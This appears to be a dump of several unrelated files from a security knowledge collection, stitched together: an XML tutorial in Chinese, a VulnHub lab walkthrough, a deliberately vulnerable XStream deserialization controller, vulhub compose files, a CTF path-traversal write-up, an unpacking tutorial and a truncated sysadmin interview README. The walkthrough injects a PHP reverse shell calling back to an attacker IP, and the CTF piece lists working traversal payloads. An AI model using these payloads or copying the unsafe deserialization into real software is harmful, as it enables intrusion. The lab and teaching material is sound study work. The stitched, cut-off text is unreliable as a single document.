文档必须包含根元素。该元素是所有其他元素的父元素。 XML 文档中的元素形成了一棵文档树。这棵树从根部开始,并扩展到树的最底端。 所有的元素都可以有子元素: ``` <root> <child> <subchild>.....</subchild> </child> </root> ``` 父、子以及同胞等术语用于描述元素之间的关系。父元素拥有子元素。相同层级上的子元素成为同胞(兄弟或姐妹)。 所有的元素都可以有文本内容和属性(类似 HTML 中)。 例如: ```xml <bookstore> <book category="COOKING"> <title lang="en">Everyday Italian</title> <author>Giada De Laurentiis</author> <year>2005</year> <price>30.00</price> </book> <book category="CHILDREN"> <title lang="en">Harry Potter</title> <author>J K. Rowling</author> <year>2005</year> <price>29.99</price> </book> <book category="WEB"> <title lang="en">Learning XML</title> <author>Erik T. Ray</author> <year>2003</year> <price>39.95</price> </book> </bookstore> ``` 实例中的根元素是 `<bookstore>`。文档中的所有 `<book>` 元素都被包含在 `<bookstore>` 中。 `<book>` 元素有 4 个子元素:`<title>`、`<author>`、`<year>`、`<price>`。 --- ### XML 文档的构建模块 所有的 XML 文档(以及 HTML 文档)均由以下简单的构建模块构成: - 元素 元素是 XML 以及 HTML 文档的主要构建模块,元素可包含文本、其他元素或者是空的。 实例: ```xml <body>body text in between</body> <message>some message in between</message> ``` 空的 HTML 元素的例子是 "hr"、"br" 以及 "img"。 - 属性 属性可提供有关元素的额外信息 实例: ```xml <img src="computer.gif" /> ``` - 实体 实体是用来定义普通文本的变量。实体引用是对实体的引用。 - PCDATA PCDATA 的意思是被解析的字符数据(parsed character data)。 PCDATA 是会被解析器解析的文本。这些文本将被解析器检查实体以及标记。 - CDATA CDATA 的意思是字符数据(character data)。 CDATA 是不会被解析器解析的文本。 --- ### 元素 **什么是 XML 元素?** XML 元素指的是从(且包括)开始标签直到(且包括)结束标签的部分。 一个元素可以包含: - 其他元素 - 文本 - 属性 - 或混合以上所有... ```xml <bookstore> <book category="CHILDREN"> <title>Harry Potter</title> <author>J K. Rowling</author> <year>2005</year> <price>29.99</price> </book> <book category="WEB"> <title>Learning XML</title> <author>Erik T. Ray</author> <year>2003</year> <price>39.95</price> </book> </bookstore> ``` 在上面的实例中,`<bookstore>` 和 `<book>` 都有元素内容,因为他们包含其他元素。`<book>` 元素也有属性(category="CHILDREN")。`<title>`、`<author>`、`<year>` 和 `<price>` 有文本内容,因为他们包含文本。 **XML 命名规则** XML 元素必须遵循以下命名规则: - 名称可以包含字母、数字以及其他的字符 - 名称不能以数字或者标点符号开始 - 名称不能以字母 xml(或者 XML、Xml 等等)开始 - 名称不能包含空格 可使用任何名称,没有保留的字词。 **最佳命名习惯** 使名称具有描述性。使用下划线的名称也很不错:`<first_name>`、`<last_name>`。 名称应简短和简单,比如:`<book_title>`,而不是:`<the_title_of_the_book>`。 避免 "-" 字符。如果你按照这样的方式进行命名:"first-name",一些软件会认为你想要从 first 里边减去 name。 避免 "." 字符。如果你按照这样的方式进行命名:"first.name",一些软件会认为 "name" 是对象 "first" 的属性。 避免 ":" 字符。冒号会被转换为命名空间来使用(稍后介绍)。 XML 文档经常有一个对应的数据库,其中的字段会对应 XML 文档中的元素。有一个实用的经验,即使用数据库的命名规则来命名 XML 文档中的元素。 在 XML 中,éòá 等非英语字母是完全合法的,不过需要留意,你的软件供应商不支持这些字符时可能出现的问题。 **XML 元素是可扩展的** XML 元素是可扩展,以携带更多的信息。 请看下面的 XML 实例: ```xml <note> <to>Tove</to> <from>Jani</from> <body>Don't forget me this weekend!</body> </note> ``` 让我们设想一下,我们创建了一个应用程序,可将 `<to>`、`<from>` 以及 `<body>` 元素从 XML 文档中提取出来,并产生以下的输出: MESSAGE ``` To: Tove From: Jani Don't forget me this weekend! ``` 想象一下,XML 文档的作者添加的一些额外信息: ```xml <note> <date>2008-01-10</date> <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend!</body> </note> ``` 那么这个应用程序会中断或崩溃吗? 不会。这个应用程序仍然可以找到 XML 文档中的 `<to>`、`<from>` 以及 `<body>` 元素,并产生同样的输出。 XML 的优势之一,就是可以在不中断应用程序的情况下进行扩展。 ### 属性 XML 元素具有属性,类似 HTML。 属性(Attribute)提供有关元素的额外信息。 **XML 属性** 在 HTML 中,属性提供有关元素的额外信息: ```xml <img src="computer.gif"> <a href="demo.html"> ``` 属性通常提供不属于数据组成部分的信息。在下面的实例中,文件类型与数据无关,但是对需要处理这个元素的软件来说却很重要: ```xml <file type="gif">computer.gif</file> ``` **XML 属性必须加引号** 属性值必须被引号包围,不过单引号和双引号均可使用。比如一个人的性别,`person` 元素可以这样写: ```xml <person sex="female"> ``` 或者这样也可以: ```xml <person sex='female'> ``` 如果属性值本身包含双引号,你可以使用单引号,就像这个实例: ```xml <gangster name='George "Shotgun" Ziegler'> ``` 或者你可以使用字符实体: ```xml <gangster name="George &quot;Shotgun&quot; Ziegler"> ``` XML 元素 vs. 属性 请看这些实例: ```xml <person sex="female"> <firstname>Anna</firstname> <lastname>Smith</lastname> </person> ``` ```xml <person> <sex>female</sex> <firstname>Anna</firstname> <lastname>Smith</lastname> </person> ``` 在第一个实例中,sex 是一个属性。在第二个实例中,sex 是一个元素。这两个实例都提供相同的信息。 没有什么规矩可以告诉我们什么时候该使用属性,而什么时候该使用元素。我的经验是在 HTML 中,属性用起来很便利,但是在 XML 中,你应该尽量避免使用属性。如果信息感觉起来很像数据,那么请使用元素。 下面的三个 XML 文档包含完全相同的信息: 第一个实例中使用了 date 属性: ```xml <note date="10/01/2008"> <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend!</body> </note> ``` 第二个实例中使用了 date 元素: ```xml <note> <date>10/01/2008</date> <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend!</body> </note> ``` 第三个实例中使用了扩展的 date 元素: ```xml <note> <date> <day>10</day> <month>01</month> <year>2008</year> </date> <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend!</body> </note> ``` **避免 XML 属性?** 因使用属性而引起的一些问题: - 属性不能包含多个值(元素可以) - 属性不能包含树结构(元素可以) - 属性不容易扩展(为未来的变化) 属性难以阅读和维护。请尽量使用元素来描述数据。而仅仅使用属性来提供与数据无关的信息。 不要做这样的蠢事(这不是 XML 应该被使用的方式): ```xml <note day="10" month="01" year="2008" to="Tove" from="Jani" heading="Reminder" body="Don't forget me this weekend!"> </note> ``` **针对元数据的 XML 属性** 有时候会向元素分配 ID 引用。这些 ID 索引可用于标识 XML 元素,它起作用的方式与 HTML 中 id 属性是一样的。这个实例向我们演示了这种情况: ```xml <messages> <note id="501"> <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend!</body> </note> <note id="502"> <to>Jani</to> <from>Tove</from> <heading>Re: Reminder</heading> <body>I will not</body> </note> </messages> ``` 上面的 id 属性仅仅是一个标识符,用于标识不同的便签。它并不是便签数据的组成部分。 元数据(有关数据的数据)应当存储为属性,而数据本身应当存储为元素。 --- ## 格式验证 拥有正确语法的 XML 被称为"形式良好"的 XML。 通过 DTD 验证的 XML 是"合法"的 XML。 **验证 XML 文档** 合法的 XML 文档是"形式良好"的 XML 文档,这也符合文档类型定义(DTD)的规则: ```xml <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE note SYSTEM "Note.dtd"> <note> <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend!</body> </note> ``` 在上面的实例中,DOCTYPE 声明是对外部 DTD 文件的引用。下面的段落展示了这个文件的内容。 **XML DTD** DTD 的目的是定义 XML 文档的结构。它使用一系列合法的元素来定义文档结构: ```xml <!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> <!ELEMENT from (#PCDATA)> <!ELEMENT heading (#PCDATA)> <!ELEMENT body (#PCDATA)> ]> ``` **XML Schema** W3C 支持一种基于 XML 的 DTD 代替者,它名为 XML Schema: ```xml <xs:element name="note"> <xs:complexType> <xs:sequence> <xs:element name="to" type="xs:string"/> <xs:element name="from" type="xs:string"/> <xs:element name="heading" type="xs:string"/> <xs:element name="body" type="xs:string"/> </xs:sequence> </xs:complexType> </xs:element> ``` --- ### 查看 XML 文件 在所有主流的浏览器中,均能够查看原始的 XML 文件。 不要指望 XML 文件会直接显示为 HTML 页面。 **查看 XML 文件** ```xml <?xml version="1.0" encoding="ISO-8859-1"?> <!-- Edited by XMLSpy® --> <note> <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend!</body> </note> ``` 这个 XML 在浏览器中显示是这样的 XML 文档将显示为代码颜色化的根以及子元素。通过点击元素左侧的加号(+)或减号( - ),可以展开或收起元素的结构。要查看原始的 XML 源(不包括 + 和 - 符号),选择"查看页面源代码"或从浏览器菜单"查看源文件"。 如果一个错误的XML文件被打开,浏览器会报告错误。 **XML CSS** 通过使用 CSS(Cascading Style Sheets 层叠样式表),你可以添加显示信息到 XML 文档中。 原始 XML CSS CSS + XML 下面是 XML 文件的一小部分。第二行把 XML 文件链接到 CSS 文件: ```xml <?xml version="1.0" encoding="ISO-8859-1"?> <?xml-stylesheet type="text/css" href="cd_catalog.css"?> <CATALOG> <CD> <TITLE>Empire Burlesque</TITLE> <ARTIST>Bob Dylan</ARTIST> <COUNTRY>USA</COUNTRY> <COMPANY>Columbia</COMPANY> <PRICE>10.90</PRICE> <YEAR>1985</YEAR> </CD> <CD> <TITLE>Hide your heart</TITLE> <ARTIST>Bonnie Tyler</ARTIST> <COUNTRY>UK</COUNTRY> <COMPANY>CBS Records</COMPANY> <PRICE>9.90</PRICE> <YEAR>1988</YEAR> </CD> . . . </CATALOG> ``` 使用 CSS 格式化 XML 不是常用的方法,W3C 推荐使用 XSLT. **XML XSLT** XSLT 是首选的 XML 样式表语言。 XSLT(eXtensible Stylesheet Language Transformations)远比 CSS 更加完善。 XSLT 是在浏览器显示 XML 文件之前,先把它转换为 HTML: XSLT 文件 在上面的实例中,当浏览器读取 XML 文件时,XSLT 转换是由浏览器完成的。 在使用 XSLT 来转换 XML 时,不同的浏览器可能会产生不同结果。为了减少这种问题,可以在服务器上进行 XSLT 转换。 --- ## XML JavaScript ### XML HTTP Request **XMLHttpRequest 对象** XMLHttpRequest 对象用于在后台与服务器交换数据。 创建一个 XMLHttpRequest 对象 所有现代浏览器(IE7+、Firefox、Chrome、Safari 和 Opera)都有内建的 XMLHttpRequest 对象。 创建 XMLHttpRequest 对象的语法: ```js xmlhttp=new XMLHttpRequest(); ``` 旧版本的Internet Explorer(IE5和IE6)中使用 ActiveX 对象: ```js xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); ``` ### XML Parser 所有现代浏览器都有内建的 XML 解析器。 XML 解析器把 XML 文档转换为 XML DOM 对象 - 可通过 JavaScript 操作的对象。 **解析 XML 文档** 下面的代码片段把 XML 文档解析到 XML DOM 对象中: ```js if (window.XMLHttpRequest) {// code for IE7+, Firefox, Chrome, Opera, Safari xmlhttp=new XMLHttpRequest(); } else {// code for IE6, IE5 xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); } xmlhttp.open("GET","books.xml",false); xmlhttp.send(); xmlDoc=xmlhttp.responseXML; ``` **解析 XML 字符串** 下面的代码片段把 XML 字符串解析到 XML DOM 对象中: ```js txt="<bookstore><book>"; txt=txt+"<title>Everyday Italian</title>"; txt=txt+"<author>Giada De Laurentiis</author>"; txt=txt+"<year>2005</year>"; txt=txt+"</book></bookstore>"; if (window.DOMParser) { parser=new DOMParser(); xmlDoc=parser.parseFromString(txt,"text/xml"); } else // Internet Explorer { xmlDoc=new ActiveXObject("Microsoft.XMLDOM"); xmlDoc.async=false; xmlDoc.loadXML(txt); } ``` **跨域访问** 出于安全方面的原因,现代的浏览器不允许跨域的访问。 这意味着,网页以及它试图加载的 XML 文件,都必须位于相同的服务器上。 --- ### XML DOM XML DOM(XML Document Object Model)定义了访问和操作 XML 文档的标准方法。 XML DOM 把 XML 文档作为树结构来查看。 所有元素可以通过 DOM 树来访问。可以修改或删除它们的内容,并创建新的元素。元素,它们的文本,以及它们的属性,都被认为是节点。 **加载一个 XML 文件 - 跨浏览器实例** 下面的实例把 XML 文档("note.xml")解析到 XML DOM 对象中,然后通过 JavaScript 提取一些信息: ```html <!DOCTYPE html> <html> <body> <h1>W3Cschool Internal Note</h1> <div> <b>To:</b> <span id="to"></span><br> <b>From:</b> <span id="from"></span><br> <b>Message:</b> <span id="message"></span> </div> <script> if (window.XMLHttpRequest) {// code for IE7+, Firefox, Chrome, Opera, Safari xmlhttp=new XMLHttpRequest(); } else {// code for IE6, IE5 xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); } xmlhttp.open("GET","note.xml",false); xmlhttp.send(); xmlDoc=xmlhttp.responseXML; document.getElementById("to").innerHTML=xmlDoc.getElementsByTagName("to")[0].childNodes[0].nodeValue; document.getElementById("from").innerHTML=xmlDoc.getElementsByTagName("from")[0].childNodes[0].nodeValue; document.getElementById("message").innerHTML=xmlDoc.getElementsByTagName("body")[0].childNodes[0].nodeValue; </script> </body> </html> ``` 如需从上面的 XML 文件("note.xml")的 `<to>` 元素中提取文本 "Tove",语法是: ``` getElementsByTagName("to")[0].childNodes[0].nodeValue ``` 请注意,即使 XML 文件只包含一个 `<to>` 元素,你仍然必须指定数组索引 `[0]`。这是因为 `getElementsByTagName()` 方法返回一个数组。 **加载一个 XML 字符串 - 跨浏览器实例** 下面的实例把 XML 字符串解析到 XML DOM 对象中,然后通过 JavaScript 提取一些信息: ```html <!DOCTYPE html> <html> <body> <h1>W3Cschool Internal Note</h1> <div> <b>To:</b> <span id="to"></span><br> <b>From:</b> <span id="from"></span><br> <b>Message:</b> <span id="message"></span> </div> <script> txt="<note>"; txt=txt+"<to>Tove</to>"; txt=txt+"<from>Jani</from>"; txt=txt+"<heading>Reminder</heading>"; txt=txt+"<body>Don't forget me this weekend!</body>"; txt=txt+"</note>"; if (window.DOMParser) { parser=new DOMParser(); xmlDoc=parser.parseFromString(txt,"text/xml"); } else // Internet Explorer { xmlDoc=new ActiveXObject("Microsoft.XMLDOM"); xmlDoc.async=false; xmlDoc.loadXML(txt); } document.getElementById("to").innerHTML=xmlDoc.getElementsByTagName("to")[0].childNodes[0].nodeValue; document.getElementById("from").innerHTML=xmlDoc.getElementsByTagName("from")[0].childNodes[0].nodeValue; document.getElementById("message").innerHTML=xmlDoc.getElementsByTagName("body")[0].childNodes[0].nodeValue; </script> </body> </html> ``` --- ## Source & Reference - [XML 教程](https://www.runoob.com/xml/xml-tutorial.html)
sec-knowleage
# ACID: SERVER > https://download.vulnhub.com/acid/Acid.rar 靶场IP:`192.168.32.205` 扫描对外端口服务 ``` ┌──(root💀kali)-[/tmp] └─# nmap -p 1-65535 -sV 192.168.32.205 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-06 01:37 EDT Nmap scan report for 192.168.32.205 Host is up (0.0012s latency). Not shown: 65534 closed tcp ports (reset) PORT STATE SERVICE VERSION 33447/tcp open http Apache httpd 2.4.10 ((Ubuntu)) MAC Address: 00:0C:29:FF:21:11 (VMware) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.71 seconds ``` 访问33447端口 ![image-20220906134133510](../../.gitbook/assets/image-20220906134133510.png) 访问`/Challenge`目录 ![image-20220906134208898](../../.gitbook/assets/image-20220906134208898.png) 爆破目录 ``` ┌──(root💀kali)-[/tmp] └─# gobuster dir -u http://192.168.32.205:33447/Challenge -x php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 2>/dev/null =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.32.205:33447/Challenge [+] Method: GET [+] Threads: 100 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: php [+] Timeout: 10s =============================================================== 2022/09/06 01:43:22 Starting gobuster in directory enumeration mode =============================================================== /index.php (Status: 200) [Size: 1333] /css (Status: 301) [Size: 333] [--> http://192.168.32.205:33447/Challenge/css/] /includes (Status: 301) [Size: 338] [--> http://192.168.32.205:33447/Challenge/includes/] /js (Status: 301) [Size: 332] [--> http://192.168.32.205:33447/Challenge/js/] /include.php (Status: 302) [Size: 0] [--> protected_page.php] /styles (Status: 301) [Size: 336] [--> http://192.168.32.205:33447/Challenge/styles/] /error.php (Status: 200) [Size: 309] /cake.php (Status: 200) [Size: 496] /hacked.php (Status: 302) [Size: 0] [--> protected_page.php] /less (Status: 301) [Size: 334] [--> http://192.168.32.205:33447/Challenge/less/] ``` 访问`/cake.php `发现`/Magic_Box/` ![image-20220906134430868](../../.gitbook/assets/image-20220906134430868.png) 访问`/Magic_Box/` ![image-20220906134528635](../../.gitbook/assets/image-20220906134528635.png) 继续爆破路径 ``` ┌──(root💀kali)-[/tmp] └─# gobuster dir -u http://192.168.32.205:33447/Challenge/Magic_Box/ -x php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 2>/dev/null =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.32.205:33447/Challenge/Magic_Box/ [+] Method: GET [+] Threads: 100 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: php [+] Timeout: 10s =============================================================== 2022/09/06 01:45:48 Starting gobuster in directory enumeration mode =============================================================== /low.php (Status: 200) [Size: 0] /command.php (Status: 200) [Size: 594] /proc (Status: 301) [Size: 344] [--> http://192.168.32.205:33447/Challenge/Magic_Box/proc/] ``` 找到一个ping命令执行页面 ![image-20220906134739504](../../.gitbook/assets/image-20220906134739504.png) 添加多一个`/`就可以访问 ![image-20220906134919641](../../.gitbook/assets/image-20220906134919641.png) 在输入框输入反弹shell ``` 0;php -r '$sock=fsockopen("192.168.32.130",12345);exec("/bin/sh -i <&3 >&3 2>&3");' ``` 查找有意思的文件 ![image-20220906135710560](../../.gitbook/assets/image-20220906135710560.png) ![image-20220906135921203](../../.gitbook/assets/image-20220906135921203.png) ``` ┌──(root💀kali)-[/tmp] └─# nc -lvp 1234 > hint.pcapng listening on [any] 1234 ... 192.168.32.205: inverse host lookup failed: Unknown host connect to [192.168.32.130] from (UNKNOWN) [192.168.32.205] 41308 ``` 分析数据包,获取到以下内容。 ``` heya hello What was the name of the Culprit ??? saman and now a days he's known by the alias of 1337hax0r oh...Fuck....Great...Now, we gonna Catch Him Soon :D Yes .. We have to !! The mad bomber is on a rage Ohk...cya Over and Out ``` ![image-20220906140033419](../../.gitbook/assets/image-20220906140033419.png) su提权成功 ![image-20230208133555839](../../.gitbook/assets/image-20230208133555839.png)
sec-knowleage
package org.vulhub.xstreamsample; import com.thoughtworks.xstream.XStream; import org.springframework.web.bind.annotation.*; @RestController public class HelloController { @GetMapping(value = "/") public String hello() { return "hello, input your information please."; } @PostMapping(value = "/") public String read(@RequestBody String data) { XStream xs = new XStream(); xs.processAnnotations(User.class); User user = (User) xs.fromXML(data); return "My name is " + user.getName() + ", I am " + user.getAge().toString() + " years old."; } }
sec-knowleage
version: '2' services: saltstack: image: vulhub/saltstack:2019.2.3 ports: - "8000:8000" - "4505:4505" - "4506:4506" - "2222:22"
sec-knowleage
# Status page 10 Points ## Solution We get a page titled "Find the flag on the server" which is displaying some usage stats: ``` MemTotal: 32891152 kB MemFree: 5626532 kB MemAvailable: 27921752 kB ``` It's possible to click a "refresh" button to refresh the stats. Clicking the button triggers a request to `refresh.ajax`. The request is: ```json [{"l":3,"p":""}] ``` The response is of the form: ```json { "result": [ "MemTotal: 32891152 kB", "MemFree: 5633468 kB", "MemAvailable: 27945728 kB" ] } ``` What if we change `l` to something other than `3`? We get: ```json { "result": [ "MemTotal: 32891152 kB", "MemFree: 9702228 kB", "MemAvailable: 28062364 kB", "Buffers: 1143108 kB", "Cached: 3573264 kB", "SwapCached: 0 kB", "Active: 6266240 kB", "Inactive: 4092732 kB", "Active(anon): 3037784 kB", "Inactive(anon): 6660 kB", "Active(file): 3228456 kB", "Inactive(file): 4086072 kB", "Unevictable: 0 kB", "Mlocked: 0 kB", "SwapTotal: 0 kB", "SwapFree: 0 kB", "Dirty: 564 kB", "Writeback: 0 kB", "AnonPages: 5640504 kB", "Mapped: 523372 kB", "Shmem: 12876 kB", "KReclaimable: 11512080 kB", "Slab: 12317368 kB", "SReclaimable: 11512080 kB", "SUnreclaim: 805288 kB", "KernelStack: 44640 kB", "PageTables: 61620 kB", "NFS_Unstable: 0 kB", "Bounce: 0 kB", "WritebackTmp: 0 kB", "CommitLimit: 16445576 kB", "Committed_AS: 27131012 kB", "VmallocTotal: 34359738367 kB", "VmallocUsed: 55848 kB", "VmallocChunk: 0 kB", "Percpu: 235136 kB", "AnonHugePages: 157696 kB", "ShmemHugePages: 0 kB", "ShmemPmdMapped: 0 kB", "FileHugePages: 0 kB", "FilePmdMapped: 0 kB", "HugePages_Total: 0", "HugePages_Free: 0", "HugePages_Rsvd: 0", "HugePages_Surp: 0", "Hugepagesize: 2048 kB", "Hugetlb: 0 kB", "DirectMap4k: 1768648 kB", "DirectMap2M: 31784960 kB", "DirectMap1G: 2097152 kB" ] } ``` That looks like the result of `cat /proc/meminfo`. Can we perform directory traversal to cat a different file? | What we send | What we get back | | ----------------------------------- | ------------------------------------------------------------------- | | `[{"l":150,"p":"./../version"}]` | `Linux version 5.4.89+ (builder@000b7ffa02b3) (Chromium OS 11.0_pre391452_p20200527-r7 clang version 11.0.0 (/var/cache/chromeos-cache/distfiles/host/egit-src/llvm-project a8e5dcb072b1f794883ae8125fb08c06db678d56)) #1 SMP Sat Feb 13 19:45:14 PST 2021"` | | `[{"l":150,"p":"./../self/cwd"}]` | `{"result":["cloud-grid-runner.js","config","create-app.js","factories.js","g","jest.config.js","jest.e2e.config.js","jest.fakes.config.js","jest.it.config.js","jest.it.data.config.js","jest.it.parallel.config.js","node_modules","package-lock.json","package.json","src"]}` | | `[{"l":150,"p":"./../self/src"}]` | `{"result":["bi-logging","config","handlers","init","js-server-side","libs","middleware","npm-support","preload","runtime-env","tracing.js","uncaught-exception-handler.js"]}` | | `[{"l":150,"p":"./../self/cwd/src/../../../../"}]` | `{"result":["etc","lib","lib64","node","proc","sys","user-code","usr"]}` | | `[{"l":150,"p":"./../self/cwd/src/../../../../user-code"}]` | `{"result":["d1r3c70rY_7R4v3R54L","public"]}` |
sec-knowleage
version: '2' services: flink: image: vulhub/flink:1.11.2 command: jobmanager ports: - "8081:8081" - "6123:6123"
sec-knowleage
### 手动查找 IAT 并使用 ImportREC 重建 示例程序可以从此链接下载: [manually_fix_iat.zip](https://github.com/ctf-wiki/ctf-challenges/blob/master/reverse/unpack/example/manually_fix_iat.zip) 我们常用的`ImportREC`脱壳是使用的软件自带的`IAT auto search`, 但是如果我们要手动查找`IAT`的地址并`dump`出来, 又该怎么操作呢? 首先使用ESP定律, 可以很快地跳转到`OEP: 00401110`. 我们右键点击, 选择`查找->所有模块间的调用` 显示出调用的函数列表, 我们双击其中的某个函数(注意这里要双击的应该是程序的函数而不是系统函数) 我们来到了函数调用处 右键点击`跟随`, 进入函数 然后再右键点击`数据窗口中跟随->内存地址` 这里因为显示是十六进制值, 不方便查看, 我们可以在数据窗口点击右键选择`长型->地址`, 就可以显示函数名 注意我们要向上翻到IAT表的起始位置, 可以看到最开始的函数地址是`004050D8`的`kernel.AddAtomA`, 我们向下找到最后一个函数, 也就是`user32.MessageBoxA`函数, 计算一下整个IAT表的大小。在OD的最下方有显示`块大小:0x7C`, 所以我们整个IAT块大小就是`0x7C` 打开`ImportREC`, 选择我们正在调试的这个程序, 然后分别输入`OEP:1110, RVA:50D8, SIZE:7C`, 然后点击`获取输入表` 这里在输入表窗口中右键选择`高级命令->选择代码块`. 然后会弹出窗口, 选择完整转储, 保存为`dump.exe`文件 dump完成后, 选择`转储到文件`, 这里选择修复我们刚刚dump出的dump.exe, 得到一个`dump\_.exe`. 这时整个脱壳就完成了
sec-knowleage
<p align="center"> <a href="https://github.com/trimstray/test-your-sysadmin-skills"> <img src="https://github.com/trimstray/test-your-sysadmin-skills/blob/master/static/img/sysadmin_preview.png" alt="Master"> </a> </p> <br> <p align="center">:star:</p> <p align="center">"<i>A great Admin doesn't need to know everything, but they should be able to come up with amazing solutions to impossible projects.</i>" - cwheeler33 (ServerFault)</p> <p align="center">:star:</p> <p align="center">"<i>My skills are making things work, not knowing a billion facts. [...] If I need to fix a system I’ll identify the problem, check the logs and look up the errors. If I need to implement a solution I’ll research the right solution, implement and document it, the later on only really have a general idea of how it works unless I interact with it frequently... it’s why it’s documented.</i>" - Sparcrypt (Reddit)</p> <br> <p align="center"> <a href="https://github.com/trimstray/test-your-sysadmin-skills/pulls"> <img src="https://img.shields.io/badge/PRs-welcome-brightgreen.svg?longCache=true" alt="Pull Requests"> </a> <a href="LICENSE.md"> <img src="https://img.shields.io/badge/License-MIT-lightgrey.svg?longCache=true" alt="MIT License"> </a> </p> <p align="center"> <a href="https://twitter.com/trimstray" target="_blank"> <img src="https://img.shields.io/twitter/follow/trimstray.svg?logo=twitter"> </a> </p> <div align="center"> <sub>Created by <a href="https://twitter.com/trimstray">trimstray</a> and <a href="https://github.com/trimstray/test-your-sysadmin-skills/graphs/contributors">contributors</a> </div> <br> **** <br> :information_source: &nbsp;This project contains **284** test questions and answers that can be used as a test your knowledge or during an interview/exam for position such as **Linux (\*nix) System Administrator**. :heavy_check_mark: &nbsp;The answers are only **examples** and do not exhaust the whole topic. Most of them contains **useful resources** for a deeper understanding. :warning: &nbsp;Questions marked **`***`** don't have answer yet or answer is incomplete - **make a pull request to add them**! :traffic_light: &nbsp;If you find something which doesn't make sense, or something doesn't seem right, **please make a pull request** and please add valid and well-reasoned explanations about your changes or comments. :books: &nbsp;In order to improve your knowledge/skills please see [devops-interview-questions](https://github.com/bregman-arie/devops-interview-questions). It looks really interesting. <br> <p align="center"> » <b><code><a href="https://github.com/trimstray/test-your-sysadmin-skills/issues">All suggestions are welcome</a></code></b> « </p> <br> ## Table of Contents | <b><u>The type of chapter</u></b> | <b><u>Number of questions</u></b> | <b><u>Short description</u></b> | | :--- | :--- | :--- | | <b>[Introduction](#introduction)</b> ||| | :small_orange_diamond: [Simple Questions](#simple-questions) | 14 questions | Relaxed, fun and simple - are great for starting everything. | | <b>[General Knowledge](#general-knowledge)</b> ||| | :small_orange_diamond: [Junior Sysadmin](#junior-sysadmin) | 65 questions | Reasonably simple and straight based on basic knowledge. | | :small_orange_diamond: [Regular Sysadmin](#regular-sysadmin) | 94 questions | The mid level of questions if that you have sound knowledge. | | :small_orange_diamond: [Senior Sysadmin](#senior-sysadmin) | 99 questions | Hard questions and riddles. Check it if you want to be good. | | <b>[Secret Knowledge](#secret-knowledge)</b> || | :small_orange_diamond: [Guru Sysadmin](#guru-sysadmin) | 12 questions | Really deep questions are to get to know Guru Sysadmin. | <br> ## <a name="introduction">Introduction</a> ### :diamond_shape_with_a_dot_inside: <a name="simple-questions">Simple Questions</a> - <b>What did you learn this week?</b> - <b>What excites or interests you about the sysadmin world?</b> - <b>What is a recent technical challenge you experienced and how did you solve it?</b> - <b>Tell me about the last major project you finished.</b> - <b>Do you contribute to any open source projects?</b> - <b>Describe the setup of your homelab.</b> - <b>What personal achievement are you most proud of?</b> - <b>Tell me about the biggest mistake you've made. How would you do it differently today?</b> - <b>What software tools are you going to install on the first day at a new job?</b> - <b>Tell me about how you manage your knowledge database (e.g. wikis, files, portals).</b> - <b>What news sources do you check daily? (sysadmin, security-related or other)</b> - <b>Your NOC team has a new budget for sysadmin certifications. What certificate would you like and why?</b> - <b>How do you interact with developers: *us vs. them* or *all pulling together with a different approach*?</b> - <b>Which sysadmin question would you ask, if you were interviewing me, to know, how good I'm with non-standard situations?</b> ## <a name="general-knowledge">General Knowledge</a> ### :diamond_shape_with_a_dot_inside: <a name="junior-sysadmin">Junior Sysadmin</a> ###### System Questions (37) <details> <summary><b>Give some examples of Linux distribution. What is your favorite distro and why?</b></summary><br> - Red Hat Enterprise Linux - Fedora - CentOS - Debian - Ubuntu - Mint - SUSE Linux Enterprise Server (SLES) - SUSE Linux Enterprise Desktop (SLED) - Slackware - Arch - Kali - Backbox My favorite Linux distribution: - **Arch Linux**, which offers a nice minimalist base system on which one can build a custom operating system. The beauty of it too is that it has the Arch User Repository (AUR), which when combined with its official binary repositories allows it to probably have the largest repositories of any distribution. Its packaging process is also very simple, which means if one wants a package not in its official repositories or the AUR, it should be easy to make it for oneself. - **Linux Mint**, which is also built from Ubuntu LTS releases, but features editions featuring a few different desktop environments, including Cinnamon, MATE and Xfce. Mint is quite polished and its aesthetics are rather appealing, I especially like its new icon theme, although I do quite dislike its GTK+ theme (too bland to my taste). I’ve also found a bug in its latest release Mint 19, that is getting quite irritating as I asked for with it over a fortnight ago on their forums and I have received no replies so far and it is a bug that makes my life on it more difficult. - **Kali Linux**, is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali contains several hundred tools which are geared towards various information security tasks, such as Penetration Testing, Security research, Computer Forensics and Reverse Engineering. Useful resources: - [List of Linux distributions](https://en.wikipedia.org/wiki/List_of_Linux_distributions) - [What is your favorite Linux distro and why?](https://www.quora.com/What-is-your-favorite-Linux-distro-and-why) </details> <details> <summary><b>What are the differences between Unix, Linux, BSD, and GNU?</b></summary><br> **GNU** isn't really an OS. It's more of a set of rules or philosophies that govern free software, that at the same time gave birth to a bunch of tools while trying to create an OS. So **GNU** tools are basically open versions of tools that already existed, but were reimplemented to conform to 